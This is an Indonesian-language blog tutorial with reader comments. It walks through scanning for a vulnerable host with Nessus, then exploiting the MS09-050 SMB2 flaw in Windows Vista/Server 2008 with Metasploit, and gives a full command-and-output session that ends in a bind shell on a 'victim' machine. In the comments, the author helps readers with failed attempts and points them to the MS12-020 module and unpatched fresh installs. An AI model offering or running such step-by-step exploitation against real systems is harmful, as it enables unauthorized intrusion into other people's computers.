Pada suatu hari Joni ingin masuk rumah Pak Doni. Pak Doni punya satpam di depan rumahnya. Joni bingung, bagaimana bisa masuk ke rumah Pak Doni tanpa sepengetahuan satpam. Ah.. ternyata susah juga.. Tapi Joni punya ide untuk ngajak satpam ngobrol-ngobrol aja di depan gerbang. Sambil makan kacang, tak lupa 3 botol bir. Joni ikut-ikut aja minum, tapi cuma sedikit. Satpamnya aji mumpung di traktir, malah hampir 3 botol itu abis sama dia.. Yah, pada akhirnya tau lah.. si satpam mabok sampe tertidur. Joni bisa masuk deh ke rumah Pak Doni. Inilah yang disebut ‘eksploitasi’ si satpam.
Prinsip hacking yang kali ini akan saya share ini secara garis besar adalah memanfaatkan vulnerability pada service SMB2 Windows Vista/7/Server 2008 di port 445 yang selalu dibuka secara default/bawaan Windows. Vulnerability itu yang akan di eksploitasi oleh program yang namanya eksploit. Eksploit yang akan kita gunakan ditulis dalam bahasa ruby (ekstensi *.rb). Jika ingin melihat script eksploitnya bisa berkunjung ke sini. Setelah SMB2 target telah di eksploitasi, akan dibuat sebuah shell sehingga kita berada di ‘cmd prompt’ korban. Kalo sudah di area ‘cmd prompt’ korban, dengan sedikit pengetahuan tentang command dasar cmd, kita udah bisa iseng di komputer korban hehehe. Misal, membuat folder di desktopnya dengan judul ‘kenalan_duonkzz’ (hahaha). Sudah ngerti kira-kira apa yang akan kita lakukan? Oke.. Mari kita lanjut…
Sebelum membuat tulisan ini, tentunya saya udah coba dulu ke target. Tetapi sebelum saya nyerang target, tentunya langkah yang saya lakukan adalah mencari target dulu. Iya kan? Target yang baik adalah yang lemah (ya iyalah haha). Untuk mencari target yang lemah, kita bisa gunakan tools yang namanya Nessus. Di Nessus itu ntar dilaporkan deh.. host target A berpotensi rendah untuk di hack (berarti dia kuat) dan host B berpotensi tinggi untuk di hack (berarti ini makanan empuk hehe).. dan sebagainya. Hasil laporan Nessus bisa dilihat pada gambar di bawah ini.
Oke, ternyata Nessus memberikan laporan bahwa host 192.168.12.51 mempunyai risiko tinggi untuk dieksploitasi SMB2-nya (MS09-050).
Sekarang tahap dua adalah menggunakan tools pamungkas-nya deh bernama Metasploit. Metasploit-lah yang akan mengeksekusi eksploit. Berdasarkan informasi yang saya dapatkan dari Nessus, maka eksploit yang akan saya pakai tentu saja yang MS09-050. Sebenarnya ada ratusan (jumlah eksploit ketika tulisan ini dibuat –red) eksploit di metasploit.
Oke langsung saja, ini dia seluruh command di metasploit yang saya ketik (penjelasannya tepat di bawah commandnya, -yang warna ijo-). Yang warna abu-abu ato hitam pucat itu adalah teks keluaran dari Metasploitnya. Warna merah adalah exploit yang kita gunakan. Saya hentikan sampai ada tulisan C:\Windows\System32> karena setelah itu adalah terserah anda mo ngetik command apa. Itu adalah shell/cmd di komputer target!! Hehe. Tapi jangan pernah merusak atau delete-delete file. Coba anda bayangkan bagaimana kalo komputer kita yang digituin? Jadi, mending buat folder aja di desktop korban dengan judul ‘Patch tuh lobang MS09-050’ kayaknya bagus juga haha..
| | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 628 exploits - 309 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r10978 updated today (2010.11.11) msf > use windows/smb/ms09_050_smb2_negotiate_func_index --perintah untuk menggunakan exploit ms09_050_smb2_negotiate_func_index msf exploit(ms09_050_smb2_negotiate_func_index) > show options --melihat opsi untuk exploit jenis tersebut.. Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 192.168.12.51 RHOST => 192.168.12.51 --Remote Host (RHOST) atau target adalah komputer 192.168.12.51... msf exploit(ms09_050_smb2_negotiate_func_index) > show options --coba cek sekarang.. field RHOST udah keisi.. Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.12.51 yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/shell_bind_tcp payload => windows/shell_bind_tcp --payload yang kita gunakan ketika eksploitasi port 445 berhasil adalah menciptakan shell/cmd (binded TCP) msf exploit(ms09_050_smb2_negotiate_func_index) > show options --cek lagi optionnya dah... Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.12.51 yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload options (windows/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST 192.168.12.51 no The target address Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) msf exploit(ms09_050_smb2_negotiate_func_index) > exploit --EXPLOIT!! wish me luck... [*] Started bind handler [*] Connecting to the target (192.168.12.51:445)... [*] Sending the exploit packet (1111 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Command shell session 2 opened (192.168.5.167:56697 -> 192.168.12.51:4444) at 2010-11-11 14:56:53 +0700 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32> --Welcome to Our Target PC.. hehe
Untuk pengunjung yang datang ke blog ini hanya sekedar mampir saja, daripada mubazir kata-kata (haha) saya sarankan secepatnya untuk update sistem operasi Windows anda dengan yang terbaru. Jadi, jangan ngeremehin update Windows anda. Apakah setelah pertama kali menginstall windows, anda belum pernah sekalipun melakukan update windows? Berarti (mungkin) sebentar lagi komputer anda yang jadi bahan cerita di blog orang lain lagi. Hahah… Hidup Linux Slackware!! *eh…
keren nih tutorialnya…
btw itu vulnerable di wind*ws vista ma seven sama ya?
utk exploit MS09-050 akan mengeksploitasi kelemahan negotiate pada service message block (smb) versi 2 yang adanya tuh di versi windows vista ke atas.. berarti yaa maksudnya sama seven juga kena. sering2lah update windowsnya, kalo menggunakan windows 🙂
thnks ilmunya,
btw, bs minta tolong dijelasin sebenarnya paket apa yang dikirim pada saat qt use axilary, exploit dan payload. tolong jelaskan perbedaan ketiganya dari sisi fungsinya, jenis packet datanya, dll
thanks b4
auxilary itu adalah tools tambahan untuk melakukan serangan. (misal portscan, bruteforce attack, dll) tapi auxilary ga dipasang payload.
berbeda dengan exploit yang ada payloadnya. kalo analogi bom, exploit itu bomnya, payload itu isi bomnya kalo meledak mau gimana (misal: pake gas air mata, api, biogas, dll).
payloadnya juga macem2.. ada yg memunculkan shell korban, shutdown, upload sesuatu, ada juga meterpreter semacam media console untuk ngakses pc korban dengan command2 lebih banyak daripada shell. (bisa capture desktop yg sedang aktif, kill process, nyalain webcam dan snap)
kalo masih penasaran, baca aja langsung ke sini mas http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
terima kasih..
bos gw dh nyoba tapi hasilnya begini
[*] Started bind handler
[*] Connecting to the target (192.168.20.249:445)…
[*] Sending the exploit packet (923 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Exploit completed, but no session was created.
kenapa ya…???
kak,, kok di windows 7 ga bsa ya???
gmna carany nh???
mhon bntuany kak..
tq..
ini bugs lama (tahun 2009) jadi mungkin sistemnya udah di patch. untuk windows 7, coba pakai bug Microsoft Security Bulletin terbaru spt MS12-020: http://metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids tapi pahami dulu apa akibat MS12-020 itu ya.. saya gak nanggung ;p
mantaf kang, sy br mo mulai belajar tehnik hacker yg bae..
[*] Started bind handler
[*] Connecting to the target (192.168.1.103:445)…
[*] Sending the exploit packet (823 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
cman smpe sni…
gmna ne bos…???
probabilitas berhasilnya semakin kesini semakin sulit karena bug SMB2 nya mungkin sudah di patch oleh pengguna melalui Microsoft Update. ini exploit tahun 2009, dan saya mencobanya di awal tahun 2011, ketika itu masih ada Windows yang SMB2 nya vulnerable. Kalau dicoba di tahun 2013 kemungkinan ya itu tadi.. sudah di patch.
btw, coba dilakukan dengan fresh install Windows Vista/7 di mesin target. diharapkan fresh install di target akan menjalankan OS yang tanpa patch di protokol SMB2 nya. kecuali kalau menggunakan CD instalasi yang baru, kemungkinan besar protokol SMB2 nya sudah di patch secara default pada saat fresh install…
saya kira begitu. thanks mas sudah berkunjung 🙂
boss ko ga berhasil ane pake OS windows 7..
pas di exploit ko ga kebuka session nya..
mohon bantuannya boss
gan koc udah saya gunakan caranya agan, koc gk bisa gan ?
kalau udah di exploit gk langsung masuk ke sistemnya, seperti gambar totur tersebut..
terima kasih.
gan kalo untuk mengetahui bugs nya bisa pake aplikasi atau gimana ada cara lain?